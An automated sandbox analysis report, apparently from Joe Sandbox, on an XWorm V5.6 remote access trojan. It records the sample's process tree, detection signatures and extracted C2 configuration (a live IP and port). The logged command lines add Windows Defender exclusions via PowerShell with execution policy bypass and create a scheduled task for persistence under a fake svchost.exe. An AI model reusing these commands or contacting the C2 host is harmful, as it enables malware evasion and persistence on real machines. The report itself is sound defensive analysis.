Windows Analysis Report
file.exe

Overview

General Information

Sample name: file.exe
Analysis ID: 1583455
MD5: 838f4cdbbfc3d37d94c45da811be76a8
SHA1: 822be42f201602ee3a7bb84363e1edd8dc595651
SHA256: c4d520b953525a1e9ad38ec6a8addef6584ca7e1d479bc1ddc6ef3a79a537bce
Tags: NET, exe, MSIL, user-jstrosch

Detection

XWorm
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Schedule system process
Suricata IDS alerts for network traffic
System process connects to network (likely due to code injection or exploit)
Yara detected XWorm
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains potential unpacker
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Bypasses PowerShell execution policy
C2 URLs / IPs found in malware configuration
Check if machine is in data center or colocation facility
Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
Drops PE files with benign system names
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Machine Learning detection for sample
Protects its processes via BreakOnTermination flag
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sample uses string decryption to hide its real strings
Sigma detected: Files With System Process Name In Unsuspected Locations
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Sigma detected: Suspect Svchost Activity
Sigma detected: System File Execution Location Anomaly
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Uses schtasks.exe or at.exe to add and modify task schedules
Yara detected Generic Downloader
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Powershell Defender Exclusion
Sigma detected: Startup Folder File Write
Sigma detected: Suspicious Add Scheduled Task Parent
Sigma detected: Suspicious Schtasks From Env Var Folder
Sigma detected: Uncommon Svchost Parent Process
Stores files to the Windows start menu directory
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64
  • file.exe (PID: 6204 cmdline: "C:\Users\user\Desktop\file.exe" MD5: 838F4CDBBFC3D37D94C45DA811BE76A8)
    • FullOption_2.1Xenos.exe (PID: 6632 cmdline: "C:\Users\user\AppData\Roaming\FullOption_2.1Xenos.exe" MD5: C442A9B9299246B2E5683641A4341641)
      • FullOption_2.1Xenos.exe (PID: 5276 cmdline: "C:\Users\user\AppData\Roaming\FullOption_2.1Xenos.exe" MD5: C442A9B9299246B2E5683641A4341641)
      • svchost.exe (PID: 2044 cmdline: "C:\Users\user\AppData\Roaming\svchost.exe" MD5: 6D378D7AF71086710318CDDA873D9348)
    • svchost.exe (PID: 5280 cmdline: "C:\Users\user\AppData\Roaming\svchost.exe" MD5: 6D378D7AF71086710318CDDA873D9348)
      • powershell.exe (PID: 3964 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\svchost.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 2968 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 6932 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'svchost.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 6204 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 1460 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\svchost.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 5908 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 4352 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'svchost.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 3596 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • schtasks.exe (PID: 4424 cmdline: "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "svchost" /tr "C:\Users\user\AppData\Roaming\svchost.exe" MD5: 76CD6626DD8834BD4A42E6A565104DC2)
        • conhost.exe (PID: 4004 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • svchost.exe (PID: 5964 cmdline: C:\Users\user\AppData\Roaming\svchost.exe MD5: 6D378D7AF71086710318CDDA873D9348)
  • svchost.exe (PID: 5744 cmdline: "C:\Users\user\AppData\Roaming\svchost.exe" MD5: 6D378D7AF71086710318CDDA873D9348)
  • svchost.exe (PID: 1484 cmdline: "C:\Users\user\AppData\Roaming\svchost.exe" MD5: 6D378D7AF71086710318CDDA873D9348)
  • svchost.exe (PID: 3840 cmdline: C:\Users\user\AppData\Roaming\svchost.exe MD5: 6D378D7AF71086710318CDDA873D9348)
  • cleanup
{"C2 url": ["45.141.26.134"], "Port": 7000, "Aes key": "<123456789>", "SPL": "<Xwormmm>", "Install file": "USB.exe", "Version": "XWorm V5.6"}
Source | Rule | Description | Author | Strings
C:\Users\user\AppData\Roaming\svchost.exe | JoeSecurity_XWorm | Yara detected XWorm | Joe Security
C:\Users\user\AppData\Roaming\svchost.exe | JoeSecurity_GenericDownloader_1 | Yara detected Generic Downloader | Joe Security
C:\Users\user\AppData\Roaming\svchost.exe | rat_win_xworm_v3 | Finds XWorm (version XClient, v3) samples based on characteristic strings | Sekoia.io
      • 0xc74b:$str01: $VB$Local_Port
      • 0xc778:$str02: $VB$Local_Host
      • 0xac5f:$str03: get_Jpeg
      • 0xb2bf:$str04: get_ServicePack
      • 0xde10:$str05: Select * from AntivirusProduct
      • 0xe707:$str06: PCRestart
      • 0xe71b:$str07: shutdown.exe /f /r /t 0
      • 0xe7cd:$str08: StopReport
      • 0xe7a3:$str09: StopDDos
      • 0xe899:$str10: sendPlugin
      • 0xea19:$str12: -ExecutionPolicy Bypass -File "
      • 0xec88:$str13: Content-length: 5235
C:\Users\user\AppData\Roaming\svchost.exe | MALWARE_Win_AsyncRAT | Detects AsyncRAT | ditekSHen
      • 0xd5c5:$s6: VirtualBox
      • 0xd523:$s8: Win32_ComputerSystem
      • 0xf17d:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
      • 0xf21a:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
      • 0xf32f:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
      • 0xeba3:$cnc4: POST / HTTP/1.1
Source | Rule | Description | Author | Strings
00000003.00000000.1667439637.0000000000A32000.00000002.00000001.01000000.00000007.sdmp | JoeSecurity_XWorm | Yara detected XWorm | Joe Security
00000003.00000000.1667439637.0000000000A32000.00000002.00000001.01000000.00000007.sdmp | MALWARE_Win_AsyncRAT | Detects AsyncRAT | ditekSHen
        • 0xd3c5:$s6: VirtualBox
        • 0xd323:$s8: Win32_ComputerSystem
        • 0xef7d:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
        • 0xf01a:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
        • 0xf12f:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
        • 0xe9a3:$cnc4: POST / HTTP/1.1
00000002.00000002.1682898125.00000000027F1000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_XWorm | Yara detected XWorm | Joe Security
00000002.00000002.1682898125.00000000027F1000.00000004.00000800.00020000.00000000.sdmp | MALWARE_Win_AsyncRAT | Detects AsyncRAT | ditekSHen
          • 0x39e3e:$s6: VirtualBox
          • 0x4c47e:$s6: VirtualBox
          • 0x39d9c:$s8: Win32_ComputerSystem
          • 0x4c3dc:$s8: Win32_ComputerSystem
          • 0x3c4c4:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
          • 0x4eb04:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
          • 0x3c561:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
          • 0x4eba1:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
          • 0x3c676:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
          • 0x4ecb6:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
          • 0x3b70a:$cnc4: POST / HTTP/1.1
          • 0x4dd4a:$cnc4: POST / HTTP/1.1
00000003.00000002.2914398163.0000000002E01000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_XWorm | Yara detected XWorm | Joe Security
Source | Rule | Description | Author | Strings
0.2.file.exe.2cb6568.2.unpack | JoeSecurity_XWorm | Yara detected XWorm | Joe Security
0.2.file.exe.2ca5528.1.unpack | JoeSecurity_XWorm | Yara detected XWorm | Joe Security
0.2.file.exe.2cb6568.2.unpack | rat_win_xworm_v3 | Finds XWorm (version XClient, v3) samples based on characteristic strings | Sekoia.io
                • 0xa94b:$str01: $VB$Local_Port
                • 0xa978:$str02: $VB$Local_Host
                • 0x8e5f:$str03: get_Jpeg
                • 0x94bf:$str04: get_ServicePack
                • 0xc010:$str05: Select * from AntivirusProduct
                • 0xc907:$str06: PCRestart
                • 0xc91b:$str07: shutdown.exe /f /r /t 0
                • 0xc9cd:$str08: StopReport
                • 0xc9a3:$str09: StopDDos
                • 0xca99:$str10: sendPlugin
                • 0xcc19:$str12: -ExecutionPolicy Bypass -File "
                • 0xce88:$str13: Content-length: 5235
0.2.file.exe.2ca5528.1.unpack | rat_win_xworm_v3 | Finds XWorm (version XClient, v3) samples based on characteristic strings | Sekoia.io
                • 0xa94b:$str01: $VB$Local_Port
                • 0xa978:$str02: $VB$Local_Host
                • 0x8e5f:$str03: get_Jpeg
                • 0x94bf:$str04: get_ServicePack
                • 0xc010:$str05: Select * from AntivirusProduct
                • 0xc907:$str06: PCRestart
                • 0xc91b:$str07: shutdown.exe /f /r /t 0
                • 0xc9cd:$str08: StopReport
                • 0xc9a3:$str09: StopDDos
                • 0xca99:$str10: sendPlugin
                • 0xcc19:$str12: -ExecutionPolicy Bypass -File "
                • 0xce88:$str13: Content-length: 5235
0.2.file.exe.2ca5528.1.unpack | MALWARE_Win_AsyncRAT | Detects AsyncRAT | ditekSHen
                • 0xb7c5:$s6: VirtualBox
                • 0xb723:$s8: Win32_ComputerSystem
                • 0xd37d:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
                • 0xd41a:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
                • 0xd52f:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
                • 0xcda3:$cnc4: POST / HTTP/1.1

System Summary

Source: File created | Author: Sander Wiebing, Tim Shelton, Nasreddine Bencherchali (Nextron Systems) | Data: EventID: 11, Image: C:\Users\user\Desktop\file.exe, ProcessId: 6204, TargetFilename: C:\Users\user\AppData\Roaming\svchost.exe
Source: Process started | Author: Florian Roth (Nextron Systems) | Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\svchost.exe', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\svchost.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Roaming\svchost.exe" , ParentImage: C:\Users\user\AppData\Roaming\svchost.exe, ParentProcessId: 5280, ParentProcessName: svchost.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\svchost.exe', ProcessId: 3964, ProcessName: powershell.exe
Source: Process started | Author: David Burkett, @signalblur | Data: Command: C:\Users\user\AppData\Roaming\svchost.exe, CommandLine: C:\Users\user\AppData\Roaming\svchost.exe, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Roaming\svchost.exe, NewProcessName: C:\Users\user\AppData\Roaming\svchost.exe, OriginalFileName: C:\Users\user\AppData\Roaming\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 660, ProcessCommandLine: C:\Users\user\AppData\Roaming\svchost.exe, ProcessId: 5964, ProcessName: svchost.exe
Source: Process started | Author: Florian Roth (Nextron Systems), Patrick Bareiss, Anton Kutepov, oscd.community, Nasreddine Bencherchali | Data: Command: "C:\Users\user\AppData\Roaming\svchost.exe" , CommandLine: "C:\Users\user\AppData\Roaming\svchost.exe" , CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Roaming\svchost.exe, NewProcessName: C:\Users\user\AppData\Roaming\svchost.exe, OriginalFileName: C:\Users\user\AppData\Roaming\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\file.exe", ParentImage: C:\Users\user\Desktop\file.exe, ParentProcessId: 6204, ParentProcessName: file.exe, ProcessCommandLine: "C:\Users\user\AppData\Roaming\svchost.exe" , ProcessId: 5280, ProcessName: svchost.exe
Source: Process started | Author: frack113 | Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\svchost.exe', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\svchost.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Roaming\svchost.exe" , ParentImage: C:\Users\user\AppData\Roaming\svchost.exe, ParentProcessId: 5280, ParentProcessName: svchost.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\svchost.exe', ProcessId: 3964, ProcessName: powershell.exe
Source: Registry Key set | Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split) | Data: Details: C:\Users\user\AppData\Roaming\svchost.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Roaming\svchost.exe, ProcessId: 5280, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\svchost
Source: Process started | Author: Florian Roth (Nextron Systems) | Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\svchost.exe', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\svchost.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Roaming\svchost.exe" , ParentImage: C:\Users\user\AppData\Roaming\svchost.exe, ParentProcessId: 5280, ParentProcessName: svchost.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\svchost.exe', ProcessId: 3964, ProcessName: powershell.exe
Source: File created | Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research) | Data: EventID: 11, Image: C:\Users\user\AppData\Roaming\svchost.exe, ProcessId: 5280, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svchost.lnk
Source: Process started | Author: Florian Roth (Nextron Systems) | Data: Command: "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "svchost" /tr "C:\Users\user\AppData\Roaming\svchost.exe", CommandLine: "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "svchost" /tr "C:\Users\user\AppData\Roaming\svchost.exe", CommandLine|base64offset|contains: j, Image: C:\Windows\System32\schtasks.exe, NewProcessName: C:\Windows\System32\schtasks.exe, OriginalFileName: C:\Windows\System32\schtasks.exe, ParentCommandLine: "C:\Users\user\AppData\Roaming\svchost.exe" , ParentImage: C:\Users\user\AppData\Roaming\svchost.exe, ParentProcessId: 5280, ParentProcessName: svchost.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "svchost" /tr "C:\Users\user\AppData\Roaming\svchost.exe", ProcessId: 4424, ProcessName: schtasks.exe
Source: Process started | Author: Florian Roth (Nextron Systems) | Data: Command: "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "svchost" /tr "C:\Users\user\AppData\Roaming\svchost.exe", CommandLine: "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "svchost" /tr "C:\Users\user\AppData\Roaming\svchost.exe", CommandLine|base64offset|contains: j, Image: C:\Windows\System32\schtasks.exe, NewProcessName: C:\Windows\System32\schtasks.exe, OriginalFileName: C:\Windows\System32\schtasks.exe, ParentCommandLine: "C:\Users\user\AppData\Roaming\svchost.exe" , ParentImage: C:\Users\user\AppData\Roaming\svchost.exe, ParentProcessId: 5280, ParentProcessName: svchost.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "svchost" /tr "C:\Users\user\AppData\Roaming\svchost.exe", ProcessId: 4424, ProcessName: schtasks.exe
Source: Process started | Author: Florian Roth (Nextron Systems) | Data: Command: "C:\Users\user\AppData\Roaming\svchost.exe" , CommandLine: "C:\Users\user\AppData\Roaming\svchost.exe" , CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Roaming\svchost.exe, NewProcessName: C:\Users\user\AppData\Roaming\svchost.exe, OriginalFileName: C:\Users\user\AppData\Roaming\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\file.exe", ParentImage: C:\Users\user\Desktop\file.exe, ParentProcessId: 6204, ParentProcessName: file.exe, ProcessCommandLine: "C:\Users\user\AppData\Roaming\svchost.exe" , ProcessId: 5280, ProcessName: svchost.exe
Source: Process started | Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements) | Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\svchost.exe', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\svchost.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Roaming\svchost.exe" , ParentImage: C:\Users\user\AppData\Roaming\svchost.exe, ParentProcessId: 5280, ParentProcessName: svchost.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\svchost.exe', ProcessId: 3964, ProcessName: powershell.exe
Source: Process started | Author: vburov | Data: Command: "C:\Users\user\AppData\Roaming\svchost.exe" , CommandLine: "C:\Users\user\AppData\Roaming\svchost.exe" , CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Roaming\svchost.exe, NewProcessName: C:\Users\user\AppData\Roaming\svchost.exe, OriginalFileName: C:\Users\user\AppData\Roaming\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\file.exe", ParentImage: C:\Users\user\Desktop\file.exe, ParentProcessId: 6204, ParentProcessName: file.exe, ProcessCommandLine: "C:\Users\user\AppData\Roaming\svchost.exe" , ProcessId: 5280, ProcessName: svchost.exe

Persistence and Installation Behavior

Source: Process started | Author: Joe Security | Data: Command: "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "svchost" /tr "C:\Users\user\AppData\Roaming\svchost.exe", CommandLine: "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "svchost" /tr "C:\Users\user\AppData\Roaming\svchost.exe", CommandLine|base64offset|contains: j, Image: C:\Windows\System32\schtasks.exe, NewProcessName: C:\Windows\System32\schtasks.exe, OriginalFileName: C:\Windows\System32\schtasks.exe, ParentCommandLine: "C:\Users\user\AppData\Roaming\svchost.exe" , ParentImage: C:\Users\user\AppData\Roaming\svchost.exe, ParentProcessId: 5280, ParentProcessName: svchost.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "svchost" /tr "C:\Users\user\AppData\Roaming\svchost.exe", ProcessId: 4424, ProcessName: schtasks.exe
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2025-01-02T20:11:58.713923+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 45.141.26.134 | 7000 | 192.168.2.8 | 49788 | TCP
2025-01-02T20:12:12.020324+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 45.141.26.134 | 7000 | 192.168.2.8 | 49788 | TCP
2025-01-02T20:12:12.238556+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 45.141.26.134 | 7000 | 192.168.2.8 | 49788 | TCP
2025-01-02T20:12:25.101934+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 45.141.26.134 | 7000 | 192.168.2.8 | 49788 | TCP
2025-01-02T20:12:38.304580+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 45.141.26.134 | 7000 | 192.168.2.8 | 49788 | TCP
2025-01-02T20:12:42.246089+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 45.141.26.134 | 7000 | 192.168.2.8 | 49788 | TCP
2025-01-02T20:12:44.916589+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 45.141.26.134 | 7000 | 192.168.2.8 | 49788 | TCP

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2025-01-02T20:11:58.741684+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.8 | 49788 | 45.141.26.134 | 7000 | TCP
2025-01-02T20:12:12.022175+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.8 | 49788 | 45.141.26.134 | 7000 | TCP
2025-01-02T20:12:25.103841+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.8 | 49788 | 45.141.26.134 | 7000 | TCP
2025-01-02T20:12:38.306446+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.8 | 49788 | 45.141.26.134 | 7000 | TCP
2025-01-02T20:12:44.917491+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.8 | 49788 | 45.141.26.134 | 7000 | TCP

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2025-01-02T20:12:12.238556+0100 | 2852874 | 1 | Malware Command and Control Activity Detected | 45.141.26.134 | 7000 | 192.168.2.8 | 49788 | TCP
2025-01-02T20:12:42.246089+0100 | 2852874 | 1 | Malware Command and Control Activity Detected | 45.141.26.134 | 7000 | 192.168.2.8 | 49788 | TCP

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2025-01-02T20:11:58.350785+0100 | 2855924 | 1 | Malware Command and Control Activity Detected | 192.168.2.8 | 49788 | 45.141.26.134 | 7000 | TCP

AV Detection

Source: file.exe | Avira: detected
Source: C:\Users\user\AppData\Roaming\svchost.exe | Avira: detection malicious, Label: TR/Spy.Gen
Source: C:\Users\user\AppData\Roaming\FullOption_2.1Xenos.exe | Avira: detection malicious, Label: TR/Dropper.Gen
Source: 00000003.00000002.2914398163.0000000002E01000.00000004.00000800.00020000.00000000.sdmp | Malware Configuration Extractor: Xworm {"C2 url": ["45.141.26.134"], "Port": 7000, "Aes key": "<123456789>", "SPL": "<Xwormmm>", "Install file": "USB.exe", "Version": "XWorm V5.6"}
Source: C:\Users\user\AppData\Roaming\FullOption_2.1Xenos.exe | ReversingLabs: Detection: 82%
Source: C:\Users\user\AppData\Roaming\svchost.exe | ReversingLabs: Detection: 91%
Source: file.exe | ReversingLabs: Detection: 71%
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: C:\Users\user\AppData\Roaming\svchost.exe | Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Roaming\FullOption_2.1Xenos.exe | Joe Sandbox ML: detected
Source: file.exe | Joe Sandbox ML: detected
Source: 00000003.00000002.2914398163.0000000002E01000.00000004.00000800.00020000.00000000.sdmp | String decryptor: 45.141.26.134
Source: 00000003.00000002.2914398163.0000000002E01000.00000004.00000800.00020000.00000000.sdmp | String decryptor: 7000
Source: 00000003.00000002.2914398163.0000000002E01000.00000004.00000800.00020000.00000000.sdmp | String decryptor: <123456789>
Source: 00000003.00000002.2914398163.0000000002E01000.00000004.00000800.00020000.00000000.sdmp | String decryptor: <Xwormmm>
Source: 00000003.00000002.2914398163.0000000002E01000.00000004.00000800.00020000.00000000.sdmp | String decryptor: XWorm V5.6
Source: 00000003.00000002.2914398163.0000000002E01000.00000004.00000800.00020000.00000000.sdmp | String decryptor: USB.exe
Source: 00000003.00000002.2914398163.0000000002E01000.00000004.00000800.00020000.00000000.sdmp | String decryptor: %AppData%
Source: 00000003.00000002.2914398163.0000000002E01000.00000004.00000800.00020000.00000000.sdmp | String decryptor: svchost.exe
Source: file.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: file.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Networking

Source: Network traffic | Suricata IDS: 2855924 - Severity 1 - ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound : 192.168.2.8:49788 -> 45.141.26.134:7000
Source: Network traffic | Suricata IDS: 2852870 - Severity 1 - ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes : 45.141.26.134:7000 -> 192.168.2.8:49788
